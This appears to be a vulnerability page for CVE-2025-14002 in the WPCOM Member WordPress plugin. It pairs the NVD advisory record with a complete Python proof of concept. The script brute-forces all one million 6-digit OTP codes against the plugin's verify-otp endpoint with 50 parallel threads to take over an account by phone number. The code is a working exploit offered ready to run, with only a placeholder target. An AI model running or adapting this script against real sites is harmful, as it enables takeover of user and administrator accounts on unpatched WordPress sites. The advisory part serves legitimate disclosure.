CVE-2025-14002

#!/usr/bin/env python3 """ CVE-2025-14002 PoC - WPCOM Member OTP Brute Force Attack Note: This PoC is for educational and authorized testing purposes only. """ import requests import itertools from concurrent.futures import ThreadPoolExecutor, as_completed import sys TARGET_URL = "https://vulnerable-site.com/wp-json/wpcom-member/v1/verify-otp" TARGET_PHONE = "+1234567890" # Target phone number MAX_WORKERS = 50 def try_otp(otp_code): """Attempt to verify a single OTP code""" headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" } data = { "phone": TARGET_PHONE, "otp": otp_code } try: response = requests.post(TARGET_URL, json=data, headers=headers, timeout=10) if response.status_code == 200: result = response.json() if result.get("success") or "token" in result: return otp_code, result except Exception as e: pass return None def brute_force_otp(): """Brute force OTP codes (6 digits: 000000-999999)""" print(f"[*] Starting OTP brute force attack on {TARGET_PHONE}") print(f"[*] Target URL: {TARGET_URL}") print(f"[*] Testing 1,000,000 OTP combinations with {MAX_WORKERS} workers...") found = None with ThreadPoolExecutor(max_workers=MAX_WORKERS) as executor: futures = {executor.submit(try_otp, str(i).zfill(6)): i for i in range(1000000)} for future in as_completed(futures): result = future.result() if result: otp, response = result print(f"\n[!] SUCCESS! Valid OTP found: {otp}") print(f"[!] Response: {response}") found = otp executor.shutdown(wait=False) break if not found: print("\n[-] No valid OTP found (may require longer attack window)") if __name__ == "__main__": brute_force_otp()

{"cve": {"id": "CVE-2025-14002", "sourceIdentifier": "[email protected]", "published": "2025-12-16T10:15:42.583", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WPCOM Member plugin for WordPress is vulnerable to authentication bypass via brute force in all versions up to, and including, 1.7.16. This is due to weak OTP (One-Time Password) generation using only 6 numeric digits combined with a 10-minute validity window and no rate limiting on verification attempts. This makes it possible for unauthenticated attackers to brute-force the verification code and authenticate as any user, including administrators, if they know the target's phone number, and the target does not notice or ignores the SMS notification with the OTP."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wpcom-member/tags/1.7.16/includes/class-sesstion.php#L29", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wpcom-member/tags/1.7.16/includes/member-functions.php#L833", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3411048/wpcom-member", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4f02ee56-40bd-4132-92e1-e2897ff2a4c4?source=cve", "source": "[email protected]"}]}}